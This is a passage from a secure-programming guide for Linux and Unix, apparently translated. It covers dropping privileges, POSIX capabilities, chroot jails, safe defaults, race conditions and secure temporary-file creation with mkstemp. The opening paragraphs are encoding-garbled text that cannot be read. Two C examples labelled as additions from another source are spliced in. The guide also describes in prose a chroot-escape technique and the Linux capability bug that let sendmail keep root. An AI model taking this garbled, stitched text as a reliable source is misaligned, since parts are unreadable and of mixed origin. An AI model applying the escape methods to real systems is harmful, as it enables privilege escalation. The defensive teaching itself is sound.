vO root mۂĂȂ΂ȂȂȂAPOSIX
PCpreB̗p𑁋}ɌĂBāAvOp
łŏɉ悤ɂĂB POSIX PCpreB́A
Linux 2.2 ⑼ Unix CNȃVXȇŗpł܂BNシ
 cap_set_proc(3) Linux ŗL capsetp(3)[`Ăяo΁A
͂Ƃ̃vŐ@\܂܂ɂāA{ɃvOK
vƂĂ@\ɉ܂BƂ΁Albg[Nf[
(ntpd)́AȑO root ŎsĂ܂B́A݂̎킹
邽߂łBAntpd  CAP_SYS_TIME Ƃ 1 ̃PCpreB
œpb`J܂Bpb`𓖂Ă΁AU҂ ntpd 
ĂÃvOɂނ̂ȑOȂ܂B

uxāvƌĂ̂ɂ́AR܂B͑
ip POSIX PCpreBgēێƁAvZX
root [U id g邩łBdvȃt@C(ݒt@Co
Ci) root LĂP[X̂ŁAU҂̓PCpreB
ŐĂĂAˑRƂăvORg[ł܂B
܂AVXěƂȂt@CCłAroot xׂ̓Ď
łĂ܂܂B Linux J[l̊g(2.4.X  2.2.19+ ̃o[W
ŗpł܂)́Ap\ȓɐ̂ɁAƗDꂽ@
񋟂Ă܂BvO rootŋN(POSIX PCpreBg)
A{ɕKvȃPCpreBɂ܂ōi肱ŁAprctl(PR_SET_KEEPCAPS,1)
Ăяo܂BāAsetuid() g root ȊÕvZXɕύX
B PR_SET_KEEPCAPS ̓vZXɃ}[NAvZX setuid  0
ȊO̒lɂɁAPCpreB̓NA܂(ʏ̓NA
)B̃vZX̐ݒ́Aexec() ƃNA܂BA
PR_SET_KEEPCAPS  Linux L̊g@\ŁAŋ߂̃o[W Linux J
[lō̗pĂ_ɒӂĂB

Linux L̃c[ 1  SuSE JuRp[ggv
Bg΁AȒPɍŏɂł܂B̃c[́A
t@CVXẽ[g uidAgidA̓PCpreBݒ肵Ă
vO𓮂܂B̃vOC邱ƂȂɁAɎy
Ɏsł܂BLo[W 0.5 ̏łB

Syntax: compartment [options] /full/path/to/program                 
                                                                    
Options:                                                            
  --chroot path   chroot to path                                    
  --user user     change UID to this user                           
  --group group   change GID to this group                          
  --init program  execute this program before doing anything        
  --cap capset    set capset name. You can specify several          
  --verbose       be verbose                                        
  --quiet         do no logging (to syslog)                         

 

܂艺L̂悤ɂ΁AS anonymous ftp T[o^pł܂
B

  compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd 

 

̃hLgĂ鎞_ł́A܂ŁA\I Linux fB
Xgr[Vł͗pł܂B󋵂͂ɕςł傤
B̃vÓA http://www.suse.de/~marc 炩_E[hł
܂B

Note that not every Unix-like system implements POSIX capabilities, and
that PR_SET_KEEPCAPS is currently a Linux-only extension, so this
approach limits portability. If it is used only as an optional extra
safety measure, however, very little portability is lost in practice.
Also note that while Linux kernel 2.2 and later provide the low-level
system calls, the easy-to-use C-level library is not installed by many
distributions, which makes the facility awkward to use from applications.
For more on POSIX capabilities in Linux, see
http://linux.kernel.org/pub/linux/libs/security/linux-privs.

FreeBSD has the jail() function for limiting privileges; see the jail
documentation <http://docs.freebsd.org/44doc/papers/jail/jail.html> for
details. There are other tools and mechanisms for limiting privileges as
well; see Section 3.10.

 

6.4.2. Minimize the Time the Privilege Can Be Used

Drop privileges as soon as possible, and permanently if you can. Linux
and Unix-like systems keep a "saved" id as well as an "effective" id. The
simplest approach is to reset the supplementary groups where appropriate
(e.g., with setgroups(2)) and then to reset the gid and the uid to the
real gid and uid, unless there is a specific reason not to. setuid and
setgid programs should do this before any fork(2). Remember that when
dropping from root to another user you must change the gid first: once
root privileges are gone, changes such as setting the gid are no longer
allowed. Also keep in mind that on some systems changing the group alone
is not enough if the process still has supplementary groups.

There is a known bug that you need to be aware of if you use POSIX
capabilities to permanently drop privileges. It affected Linux kernels
2.2.0 through 2.2.15, and probably affects other Unix-like systems that
implement POSIX capabilities as well. Details are in Bugtraq id 1322 at
http://www.securityfocus.com; in summary:

   
    POSIX "capabilities" have recently been implemented in the Linux
    kernel. These "capabilities" are an additional form of privilege
    control that allows more specific control over what privileged
    processes can do. Capabilities are implemented as three (fairly
    large) bitfields, with each bit representing a specific action a
    privileged process can perform. By setting specific bits, the actions
    of privileged processes can be controlled: access to various
    functions can be granted only to the specific parts of a program
    that require them. It is a security measure. The problem is that
    capabilities are copied across fork(), so a parent process that
    modifies its capabilities passes the modification on to its
    children. The way this can be exploited is by setting all of the
    capabilities to zero (meaning all of the bits are off) in each of
    the three bitfields and then executing a setuid program that
    attempts to drop privileges before executing code that could be
    dangerous. sendmail does exactly that. Although sendmail uses
    setuid(getuid()) to drop privileges, the setuid call fails because
    the required capability bits are not set, and since the return value
    is not checked, execution continues with superuser privileges. This
    allowed a user's .forward file to be processed as root, which put the
    user in a position to do anything.
   
Part of the fix sendmail adopted was to attempt setuid(0) after the
setuid(getuid()). Normally this attempt must fail; if it succeeds, the
program halts. See http://sendmail.net/?feed=000607linuxbug for more
information. For other programs this is a reasonable idea in the short
term, but in the long run an upgrade to a fixed system is certainly
preferable.

 

6.4.3. Minimize the Time the Privilege Is Active

Use setuid(2), seteuid(2), setgroups(2) and related functions to make
sure the program has its privileges only at the times it needs them.
Temporarily disable privileges when they are not in use. As noted above,
make sure the privileges are switched off while user input is being
processed, and enable them only when they are really required.

Note that there is a whole class of attacks, buffer overflows among them,
in which the attacker gets the program to run arbitrary code. Such code
can simply re-enable a temporarily disabled privilege, so temporarily
disabling privileges does nothing against those attacks. The only
genuinely safe approach is to drop privileges permanently as early as
possible. For that reason some people argue that "seteuid() is useless".
Nevertheless, temporarily disabling permissions does defeat an entire
class of attacks, and since it costs little it is worth doing, provided
the program also drops privileges permanently at the appropriate points.
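The order of operations described in 6.4.2 (supplementary groups, then gid, then uid) together with the verification step that sendmail adopted after the capability bug, as an added C example. This is not code from the HOWTO; it assumes Linux/glibc (setgroups(2) from <grp.h>), and the function name is the example's own.

```c
/* Added example (not the HOWTO's code): drop privileges permanently in
 * the order the text requires, then verify that they are really gone. */
#define _DEFAULT_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently switch this process to target_uid/target_gid.
 * Returns 0 on success, -1 if anything failed; on -1 the caller must
 * abort rather than carry on with privileges it believes it has shed. */
int drop_privileges_permanently(uid_t target_uid, gid_t target_gid)
{
    /* Step 1: supplementary groups.  Only root may call setgroups(),
     * and forgetting this step leaves group privileges behind. */
    if (geteuid() == 0 && setgroups(1, &target_gid) != 0)
        return -1;

    /* Step 2: gid before uid.  Once uid 0 is given up, setgid() to an
     * arbitrary group is no longer allowed. */
    if (setgid(target_gid) != 0)
        return -1;

    /* Step 3: uid last.  Called by root, setuid() sets the real,
     * effective and saved uid together, so there is no way back. */
    if (setuid(target_uid) != 0)
        return -1;

    /* Step 4: verify instead of trusting the calls.  Bugtraq id 1322
     * made setuid(getuid()) fail in a program that did not check; the
     * sendmail fix was to try to become root again and stop if that
     * works.  Same idea here. */
    if (target_uid != 0 && setuid(0) == 0)
        return -1;                        /* still root: refuse to run */
    if (getuid() != target_uid || geteuid() != target_uid)
        return -1;
    if (getgid() != target_gid || getegid() != target_gid)
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed usage: a setuid program would pass the ids of the
     * invoking user, i.e. its real uid and gid. */
    if (drop_privileges_permanently(getuid(), getgid()) != 0) {
        fprintf(stderr, "could not drop privileges, aborting\n");
        return 1;
    }
    printf("running as uid %d gid %d\n", (int)geteuid(), (int)getegid());
    return 0;
}
```

Run as root, a call with a non-zero target uid is the interesting case: after step 3 the process can no longer regain uid 0, and the function reports success only if that regain attempt actually fails.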

 

6.4.4. Minimize the Modules Granted the Privilege

If only a few modules are granted the privilege, it is much easier to
decide whether the whole program is secure. One approach is to have a
single module use the privilege and then drop it, so that the modules
called afterwards cannot misuse it. Another is to split the program into
separate executables, with the privileged part as an independent command.
Rather than one complex tool that does everything and that may have to
run as a special user (such as root), make the setuid part a simple tool
that handles only a small subset of the commands. The simple tool checks
whether its input satisfies the acceptance criteria and decides whether
to accept it; if the input passes, it hands the data to the complex tool.
The simple tool must check its input strictly and limit what it passes
on, or nothing has been gained. These approaches can be layered: for
example, a complex user-level tool can invoke a small setuid "wrapper"
program (which checks that its input has safe values) that in turn calls
the trusted tool. This approach is especially useful for GUI-based
systems: run the GUI part as an ordinary user, and have it call a
separate privileged program only when a security-relevant operation is
required.

Some applications are best implemented as a set of smaller programs that
trust one another. The simplest way is to split the application into
independent programs and rely on the file system's protections so that
nothing passes between them that should not, and nothing is visible to
outsiders, with only one (smaller) program running with privilege. A more
complex arrangement is a coordinating program that fork()s processes,
each with only the privileges it needs. The communication paths can be
set up in many ways: a "master" process can create the channels (unnamed
pipes or unnamed sockets) and then fork, and each forked process drops as
many privileges as it can. Watch out for deadlocks. Define a simple
protocol in which the less trusted processes make requests of the more
trusted ones, and have the more trusted processes support only a limited
set of requests. Set the user and group permissions so that nobody else
can interfere with the subprograms.

Some operating systems have the concept of multiple layers of trust
within a single process; Multics' rings are the classic example. Standard
Unix and Linux have no way to separate multiple levels of trust within
one process: a call into the kernel raises the privilege, but otherwise a
process has a single level of trust. This is one reason Java 2, C# (a
Java-like language) and Fluke (the basis of security-enhanced Linux) are
so interesting. Java 2, for instance, can specify very fine-grained
permissions such as the right to open a particular file, while a
general-purpose operating system usually has nothing of the kind. That
may change in the near future. For more on Java, see Section 9.6.

 

6.4.5. Consider Using fsuid to Limit Privileges

Each Linux process carries two additional values: the filesystem user id
(fsuid) and the filesystem group id (fsgid). These are the values checked
against filesystem permissions. If you are writing a program such as a
file server (an NFS server, say) that manipulates files on behalf of
particular users, consider using this Linux extension: instead of holding
root privileges, change fsuid and fsgid before accessing a file on the
user's behalf. This is convenient and gives a sturdier mechanism than
acquiring (and later shedding) privileges for each filesystem access.
Because only fsuid is set (not euid), local users cannot send signals to
the process, which would otherwise be a source of trouble. The drawback
is that these calls are not portable to other Unix-like systems.

 

6.4.6. Consider Using chroot to Minimize Available Files

You can use chroot(2) to limit the files visible to the program. This
requires setting up a directory (called the "chroot jail") with care and
then entering it correctly. It can be a fairly effective way to improve a
program's security: it is hard to interfere with files you cannot see.
It is not a defense against everything, though. Bear in mind that it is
only effective if the program does not have root privileges and has no
way of obtaining them, and if the chroot jail is set up correctly. I
recommend chroot(2)ing into a sensible location, but do not rely on it
alone; treat it as one layer of a defense in depth. Here are some notes
on using chroot(2):

 * The program can still reach objects that are shared across the whole
    machine and are not part of the file system (System V IPC and
    network sockets). The best arrangement combines chroot with separate
    user and group ids, because Unix-like systems isolate by user; then,
    if the program is subverted, it cannot damage other programs. Keep
    in mind that on most recent Unix-like systems (Linux included),
    programs that run under the same id and set out to interfere with
    each other cannot be kept apart. If programs running together under
    one uid worry you, use a system that supports some kind of mandatory
    access control over those channels.
   
 * Close every file descriptor to other files that the program will not
    use again. In particular, do not open descriptors to directories
    outside the chroot jail, or arrange things so that no such
    descriptor can exist (old-style Unix sockets and /proc are two ways
    one might appear). If the program can be handed a descriptor to a
    directory outside the jail, escaping from the jail is easy.
   
 * The chroot jail must be set up securely. Do not use an ordinary
    user's home directory (or a subdirectory of it) as a chroot jail;
    use a separate location, or a "home" directory created specially for
    the purpose. Put only the minimum set of files in it. Usually that
    means /bin, /etc, /lib and one or two other directories (e.g., /pub
    for an ftp server). In /bin, put only the programs that are needed
    after the chroot() (ideally no shell at all; a shell in the jail is
    of no use to anyone but an attacker). You may need /etc/passwd and
    /etc/group so that file listings can show names, but do not copy the
    real system values into them; replace every password with "*".
   
    In /lib, put only what is needed. Use ldd(1) to find out which
    libraries the programs in /bin require, and copy only those. On Linux
    you will probably need basic libraries such as ld-linux.so.2 and a
    few others. Alternatively, statically link the program so that no
    dynamically loaded libraries are needed at all.
   
    Normally copy the files rather than hard-linking them. This is the
    safer method, even though it uses more disk space, because an attack
    on a file inside the chroot jail does not automatically carry over
    to the real system file. Mounting /proc inside the jail, on systems
    that support /proc, is not a good idea. In fact, older Linux versions
    (2.0.x, up to at least 2.0.38) have a known security hole: a
    chroot()ed program could use the root directory visible through
    /proc to escape the chroot. Linux 2.2 fixed this particular problem,
    but there may be others, so avoid it where you can.
   
 * If the program ends up with root privileges, chroot is ineffective.
    For example, a program that can call a function like mknod(2) can
    create device files, and through them the kernel gives the program
    whatever it wants. An example of a root program breaking out of
    chroot is at http://www.suid.edu/source/breakchroot.c. It works like
    this: the program opens a file descriptor on the current directory,
    creates a subdirectory and chroots into it, uses the saved
    descriptor to return to the original current directory, then does
    "cd .." from there repeatedly (which takes it out of the chroot and
    up to the root of the real file system), and finally chroots to that
    location. By the time you read this the vulnerability may have been
    addressed, but root privileges are, by definition, "all" privileges,
    so I would not count on it. If the program must keep root
    privileges, chroot() gives only a limited benefit, and it is better
    to split the program so that at least part of it runs inside the
    jail.
   
 

 

6.4.7. Consider Minimizing the Accessible Data

Consider minimizing the amount of data that users can access. For
example, with CGI scripts, unless users must be able to read the data
directly, keep all the data the CGI scripts use outside the document
tree. Some people believe that if there is no link to the data, nobody
can reach it. That is absolutely wrong.

 

6.4.8. Consider Minimizing the Resources Available

Arrange for each process to use only the minimum of the computer's
resources it needs; then if the process "goes crazy" the damage is
contained. This is essential against denial-of-service attacks. Network
servers commonly create a separate process for each session, and limit
each process to a certain amount of CPU time and memory. Then an attacker
who sends a request designed to consume resources may saturate the CPU
for one session, but does not bring the work of the other sessions to a
halt. The attacker can still open session after session, but it is at
least an obstacle. Section 3.6 has more on how to set limits (for
example, with ulimit(1)).

 

6.5. Minimize the Functionality of a Component

A related but separate point: minimize the amount of functionality each
component provides. If a component offers many functions, consider
splitting it into smaller ones, so that users who do not need some
function can disable it. This matters particularly for network-accessible
components: with this approach a user who needs only one component can
run only that one, and nothing else is exposed.

 

6.6. Avoid Creating setuid/setgid Scripts

Many Unix-like systems, Linux among them, ignore the setuid and setgid
bits on scripts, for the reasons given earlier. Because support for
setuid scripts varies between Unix-like systems, it is best to avoid them
altogether in new applications. Perl is a partial exception: with special
configuration it can run setuid Perl scripts, so if you really need this
facility you can use Perl setuid or setgid. If you need it in some other
interpreter, check whether that interpreter supports it. A simpler
alternative is a small compiled setuid/setgid "wrapper" executable that
establishes a safe environment (for example, by clearing the environment
variables and setting only the ones required) and then invokes the
script by its full path. Make sure the attacker cannot modify the script.
Shell scripts have further problems of their own and should never be
setuid or setgid. See Section 9.4 for more on this.

 

6.7. Configure Safely and Use Safe Defaults

Configuration is very often where security goes wrong. Put effort into
two things: (1) making installation secure, and (2) making the system
easy to reconfigure while staying secure.

Never have the installation set up a working "default" password. If a new
"user" has to be created, that must be an explicit step. Set a password
that nobody could guess and leave it to the administrator to set a real
one (the system is simply not secure until that is done). Administrators
install many packages and easily forget that a password still needs
setting; if one is created with a default password they may never
realise it, whereas with an unguessable password they will find out.

Until the administrator has configured the program, it should keep a
policy of denying access. Do not ship a "sample" user that is configured
with "access to everything". In particular, when users "install
everything" (every available service), most of those services are left
in their unconfigured state. Some authentication systems come with
default policies that are far too permissive for the setting the program
is used in; some ftp servers, for example, let anyone who can log into a
user's directory read that user's files. Watch out for such defaults.

Installation scripts should install the program as securely as they can.
By default, install all files owned by root (or another system-related
user) so that no other user can modify them; that keeps non-root users
from tampering with the installation. Indeed, it is best if users who are
not trusted cannot even read the files. Do provide a way for a non-root
user to install the program in the same manner as root would, so that
users without root privileges, and administrators who do not trust the
installation, can still use it.

At installation time, check that the preconditions security depends on
actually hold, even the ones you think are obvious. Some C library
routines are insecure on some platforms; see the discussion in Section
7.1. If you do not know which platforms the application will run on, you
need platform-specific checks; if it is only ever installed on one of a
known set of platforms, the checks have to be made for those. Otherwise
you are left checking by hand, after the fact, whether the installation
was secure, because there is no way to tell from the result alone.

Make configuration, installation included, as easy as possible, and make
the easy way the "safest" way. Otherwise users who do not understand the
risk will go with whatever works first, however insecure. On Linux,
convenient tools such as linuxconf let users configure the system through
a user interface.

If there is no configuration language, make sure the defaults deny access
unless the user explicitly allows it. Sample configuration files should
carry comments that are easy to understand, so that the administrator can
see what is configurable.

 

6.8. Load Initialization Values Safely

Many programs read a file to set their defaults. Make sure an attacker
cannot change, create or modify the initialization file the program
reads. The current directory should not be a source of initialization
files: if the program is used as an editor or a browser, the user may
well be sitting in a directory that somebody else controls. Instead, if
the program is an ordinary user application, load the user's defaults
from a dotfile or dot-directory in the user's home directory. If the
program is setuid or setgid, do not read user-controlled files at all
unless you filter their contents with great care, treating them as
untrusted (they may be deliberately malicious). Load trusted
configuration values only from a place that is itself trusted (usually
files under /etc).

 

6.9. Fail Safe

A secure program should always "fail safe": design it so that when it
malfunctions, it ends up in a safe state. A security-sensitive program
that detects something wrong (an anomalous input, an "impossible" state,
and so on) should refuse service immediately and stop processing the
request. "The user probably intended this" is no excuse; refuse service.
Some reliability may be lost (from the user's point of view), but
security is preserved. There are cases where even a small exposure is
unacceptable (for instance, where safety must be preserved even at the
cost of refusing service), and then this becomes very hard indeed.

Note that the recommendation is "stop processing that request", not
"stop working altogether". In particular, most servers should not halt
entirely on bad input, because that makes denial of service trivial (an
attacker only has to send a few bogus bits to take the service down).
Sometimes stopping the whole server is necessary. A "not working" state
is safe in the sense that the attacker gets nothing from it, so it is at
least not the worst outcome.

When a check fails, think carefully about what error message to return.
Too little information makes problems hard to diagnose, while too much
helps the attacker. Usually the right choice is to return something like
"access denied" or "miscellaneous error encountered" and to write the
details to an audit log (in a place the attacker cannot control).

 

6.10. Avoid Race Conditions

A "race condition" is defined as "anomalous behavior due to unexpected
critical dependence on the relative timing of events" [FOLDOC]. Race
conditions generally involve one or more processes accessing a shared
resource (a file, a variable) where the access is not properly
controlled.

In general a process does not execute atomically; another process can
interrupt it between essentially any two instructions. If the secure
program's process is not prepared for such interruptions, another process
may be able to interfere with it. Whenever a secure program is running,
other processes may be running code in any interleaving with it, and the
program has to behave correctly whatever that interleaving is.

Race condition problems fall into two categories:

 * Interference from untrusted processes. The security literature calls
    these "sequence" or "non-atomic" conditions. They arise between
    processes of different programs: another process "jumps in" between
    the steps of the secure program, and an attacker who exploits that
    moment subverts the program. This document calls them sequencing
    problems.
   
 * Interference from trusted processes (trusted from the secure
    program's point of view). The security literature calls these
    deadlock, livelock or locking failures. They arise between processes
    of the "same" program: because each process is "the same", they fail
    to coordinate and end up unable to proceed. This too can be exploited
    for attacks. This document calls them locking problems.
   
 

6.10.1. Sequencing (Non-Atomic) Problems

In general, you must check carefully that arbitrary code running in
between any two of your operations cannot break them, whatever the
interleaving.

Loading and saving a shared variable are usually independent steps, not
one atomic operation. Put another way, "incrementing a variable" is
normally a load, an add and a store; if the variable's memory is shared
with another process, that process can interfere between the steps.

A secure program decides whether a request is allowed and then acts on
the decision. Between the decision and the action, an untrusted user must
not be able to change the condition the decision was based on. Races of
this kind are called "time of check - time of use" (TOCTOU) race
conditions.

 

6.10.1.1. Atomic Actions in the Filesystem

Failures to act atomically show up most often in the filesystem, because
the filesystem is a resource shared with other programs, and other
programs can interfere with it. A secure program should not call
access(2) before open(2) to decide whether a request is allowed, because
an attacker can switch the file between the two calls, getting the
program to open a symbolic link to a file of the attacker's choosing
instead. A secure program should set its effective id or filesystem id
and then simply open the file. There is a safe use of access(2), but only
when the user cannot affect any directory on the path from the root of
the filesystem to the file.

When creating a file, open it with the O_CREAT | O_EXCL mode and with
permissions restricted to the current user; that avoids a great many
problems. Be prepared for the open to fail. If the file must be opened
(for example, to prevent a denial of service), you have to loop:
(1) create a "random" filename, (2) open it as above, and (3) repeat if
the open fails.

Creating a file whose name another program will use can also be a
security hole. For example, the text editor "joe" had a symbolic link
vulnerability involving the file "DEADJOE". When joe exits abnormally
(system crash, xterm killed, network connection dropped, and so on), it
unconditionally appends the open buffers to a file named "DEADJOE". When
root runs joe, an attacker can create a DEADJOE symbolic link in the
directory where joe was used; joe then appends its buffers, garbage
included, to whatever file the link points to, producing a denial of
service or, worse, unauthorized access.

Another example: when you need to perform several operations on a file's
metadata (change its owner, check its status, change its permission
bits), open the file first and perform the operations on the opened file.
In other words, use fchown(), fstat() and fchmod() rather than chown(),
chgrp() and chmod(), which take filenames. This prevents the file from
being switched while the program is working with it (the classic race
condition). If, for instance, you examine a file and then call chmod() on
its name to change its permissions, an attacker can delete the file
between the two steps and replace it with a symbolic link to some other
file (say, /etc/passwd). One "pseudo-file" that can be used this way is
/dev/zero, which hands the program an endless stream of data. If the
attacker "switches" the file in the middle, the result can be dangerous.

There is a subtler point as well: when you create a file, give it the
minimum permissions and the least sharing you can right from the start.
Typically, use umask and the mode passed to open so that at first only
the user, or the user's group, can access the file. If you create a file
that everyone can read and then clear the "world readable" bit, an
attacker can open the file while the permission bits still allow it; on
most Unix-like systems permissions are checked only at open time, so the
attacker keeps the access you meant to withdraw.

On typical Unix-like systems, when more than one user can write to a
directory, the "sticky" bit should be set on that directory. Sticky
directories are a somewhat odd construct, and they do not make the
problem go away; a directory accessible only to trusted, specialised
processes (implemented with care) is preferable. The traditional Unix
temporary directories (/tmp and /var/tmp) are implemented as "sticky"
directories, and this is where the security problems surface. Let us look
at them.
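The descriptor-based pattern from the paragraphs above, as an added C example (not the HOWTO's code): open first, check the opened object with fstat(), and change its permissions with fchmod() rather than through the name. It assumes a Linux/glibc environment with O_NOFOLLOW; the scratch directory under /tmp and the function names are constructed for the demonstration.

```c
/* Added example (not the HOWTO's code): check and use the same opened
 * object, so that a path cannot be swapped between the two steps. */
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Open path for reading only if the opened object is a regular file owned
 * by `owner`.  O_NOFOLLOW refuses a symbolic link as the last component,
 * and every test is made with fstat() on the descriptor we will use.
 * Returns the descriptor, or -1. */
int open_owned_regular_file(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;                    /* a symlink fails here with ELOOP */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Narrow the permissions of an already-open file: fchmod() on the
 * descriptor, never chmod() on the name. */
int restrict_open_file(int fd)
{
    return fchmod(fd, S_IRUSR | S_IWUSR);
}

/* Demonstration in a constructed scratch directory: a regular file passes,
 * a symlink to that same file (same owner, same content) is rejected.
 * Returns 1 if both observations hold. */
int demo_descriptor_checks(void)
{
    char dir[] = "/tmp/toctou-demoXXXXXX";
    char file[64], alias[64];
    int fd, ok = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(file, sizeof file, "%s/data", dir);
    snprintf(alias, sizeof alias, "%s/alias", dir);

    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd >= 0) {
        int wrote = (write(fd, "x", 1) == 1);
        close(fd);
        if (wrote && symlink(file, alias) == 0) {
            fd = open_owned_regular_file(file, getuid());
            if (fd >= 0 && restrict_open_file(fd) == 0 &&
                open_owned_regular_file(alias, getuid()) == -1)
                ok = 1;
            if (fd >= 0)
                close(fd);
        }
    }
    unlink(alias);
    unlink(file);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("descriptor-based checks behaved as expected: %s\n",
           demo_descriptor_checks() ? "yes" : "no");
    return 0;
}
```

The point of the symlink case is that a name-based check (stat() on the alias, then open()) would have accepted it; checking the object that open() actually returned is what closes the window.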

 

6.10.1.2. Temporary Files

The problem of performing atomic operations correctly is especially acute
when creating temporary files. On most Unix-like systems temporary files
are created in /tmp or /var/tmp, directories shared by all users. While
a secure program is running, an attacker sets a trap by creating, in the
temporary directory, a symbolic link with the name the program is about
to use, pointing at some file (say, /etc/passwd). The attacker's aim is
to bring about a situation where the secure program believes the file
does not exist, and then to use the link to redirect the secure
program's operation to a different file (the program ends up opening a
file it never intended to open). Important files are often deleted or
corrupted this way. One variation of the attack tricks the program into
creating a different file. All these attacks depend on the attacker
being able to create (or otherwise reach) filesystem objects in the same
directory that the secure program uses for its temporary files.

The peculiar difficulty of creating a file in a shared directory is that
you must guarantee the filename you intend to use does not already exist
at the moment you create it. Checking "before" creating it is worthless,
because between the check and the creation another process can create a
file with that name. Using an "unpredictable" or "unique" filename is
not much better on its own, because the other process can keep trying,
creating files as many times as it likes before yours is created.

Basically, to create a temporary file in a shared (sticky) directory you
must repeat the following: (1) create a "random" filename, (2) open it
with O_CREAT | O_EXCL and very narrow permissions, and (3) stop (or try
again) if the open fails.

According to the 1997 "Single Unix Specification", the preferred way to
create an arbitrary temporary file is tmpfile(3). The tmpfile(3) function
creates a temporary file, opens a stream for it, and returns the stream
(or NULL on failure). Unfortunately, the specification does not guarantee
that the file is created securely. In an earlier version of this document
I said I was worried that not every implementation was secure. Since
then I have learned that the tmpfile(3) implementation on old System V
systems is not secure (and neither are tmpnam(3) and tempnam(3)).
Libraries that implement tmpfile(3) ought to create such files securely,
but users are not necessarily aware that their system library has a
security hole; in some cases that hole causes real trouble.

Kris Kennaway recommends mkstemp(3) for creating temporary files in
general. His reasoning is that it is better to use a well-known library
function than to build your own, and this function follows a well-known
convention; it is also unusually concise. When you use mkstemp(3), always
call umask(2) as well, so that the temporary file's permissions are
restricted to the owner, because some mkstemp(3) implementations
(basically old ones) create the temporary file readable and writable by
every user. In that state an attacker can read and write private data in
the directory. One drawback is that mkstemp(3) has no direct support for
the TMP and TMPDIR environment variables (discussed below); if you want
to honor them, you have to add code for it. Here is a C program that
shows how to use mkstemp(3) with support for those variables added, which
makes the program's behaviour portable across environments that set
them.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Report a fatal error and exit. */
void failure(const char *msg) {
 fprintf(stderr, "%s\n", msg);
 exit(1);
}

/*
 * Given a "pattern" for a temporary filename
 * (starting with the directory location and ending in XXXXXX),
 * create the file and return it.
 * This routine unlinks the file, so normally it won't appear in
 * a directory listing.
 * The pattern will be changed to show the final filename.
 */

FILE *create_tempfile(char *temp_filename_pattern)
{
 int temp_fd;
 mode_t old_mode;
 FILE *temp_file;

 old_mode = umask(077);  /* Create file with restrictive permissions */
 temp_fd = mkstemp(temp_filename_pattern);
 (void) umask(old_mode);
 if (temp_fd == -1) {
   failure("Couldn't open temporary file");
 }
 if (!(temp_file = fdopen(temp_fd, "w+b"))) {
   failure("Couldn't create temporary file's file descriptor");
 }
 if (unlink(temp_filename_pattern) == -1) {
   failure("Couldn't unlink temporary file");
 }
 return temp_file;
}


/*
 * Given a "tag" (a relative filename ending in XXXXXX),
 * create a temporary file using the tag.  The file will be created
 * in the directory specified in the environment variables
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
 * it will be created in /tmp.  Note that root (and su'd to root)
 * _will_ use TMPDIR or TMP, if defined.
 *
 */
FILE *smart_create_tempfile(char *tag)
{
 char *tmpdir = NULL;
 char *pattern;
 FILE *result;

 /* Only honor the environment when real and effective ids agree. */
 if ((getuid()==geteuid()) && (getgid()==getegid())) {
   if (! ((tmpdir=getenv("TMPDIR")))) {
     tmpdir=getenv("TMP");
   }
 }
 if (!tmpdir) {tmpdir = "/tmp";}

 /* Room for directory, "/", tag and the terminating NUL. */
 pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
 if (!pattern) {
   failure("Could not malloc tempfile pattern");
 }
 strcpy(pattern, tmpdir);
 strcat(pattern, "/");
 strcat(pattern, tag);
 result = create_tempfile(pattern);
 free(pattern);
 return result;
}



int main(void) {
 int c;
 FILE *demo_temp_file1;
 FILE *demo_temp_file2;
 char demo_temp_filename1[] = "/tmp/demoXXXXXX";
 char demo_temp_filename2[] = "second-demoXXXXXX";

 demo_temp_file1 = create_tempfile(demo_temp_filename1);
 demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
 fprintf(demo_temp_file2, "This is a test.\n");
 printf("Printing temporary file contents:\n");
 rewind(demo_temp_file2);
 while (  (c=fgetc(demo_temp_file2)) != EOF) {
   putchar(c);
 }
 putchar('\n');
 printf("Exiting; you'll notice that there are no temporary files on exit.\n");
 fclose(demo_temp_file1);
 fclose(demo_temp_file2);
 return 0;
}

Kennaway suggests that if you cannot use mkstemp(3), you should use
mkdtemp(3) to create a directory instead; that also avoids the problem.
If, as a last resort, you must use the insecure mktemp(3), use at least
10 X's if you can (if the libc allows it). Then the filename is no longer
easy to guess (with 6 X's, 5 of them are taken up by the PID, leaving a
single random character, which an attacker guesses with ease). He also
advises against tmpnam(3). What tmpnam(3) does in a threaded program is
anyone's guess, and once it has been used more than TMP_MAX times (that
is, if you keep calling it in a loop) its behaviour is no longer
guaranteed.

In short, avoid insecure functions such as mktemp(3) and tmpnam(3). If
you do use them, take special security precautions, and make a test for a
secure library implementation part of the installation. If a system has
various problems, create the files in a directory under /tmp that only
you can write to (or, if the group cannot be trusted, that the group
cannot write to either) and do not use the mk*temp() functions at all:
create the file (for instance, one whose name is known in advance)
with an open() call carrying the O_CREAT and O_EXCL flags, and check the
return value. If open() fails, handle the failure appropriately (for
instance, exit).

The GNOME programming guidelines recommend the following C code when a
filesystem object has to be created in a shared (temporary) directory.
The aim is to create a file of minimal security risk:

 char *filename;                                                       
 int fd;                                                               
                                                                       
 do {                                                                  
   filename = tempnam (NULL, "foo");                                   
   fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);    
   free (filename);                                                    
 } while (fd == -1);                                                   

Notice that although this uses the insecure tempnam(3), the loop with
O_CREAT and O_EXCL covers the security weakness. What you must not forget
is that the filename has to be free()d, and that eventually you close()
and unlink() the file. If you want to use the standard C I/O library,
convert the file descriptor into a FILE * with fdopen() in "w+b" mode.
This solution will not work on NFS version 2 (v2) systems, because old
NFS does not support O_EXCL properly. It has one more drawback: because
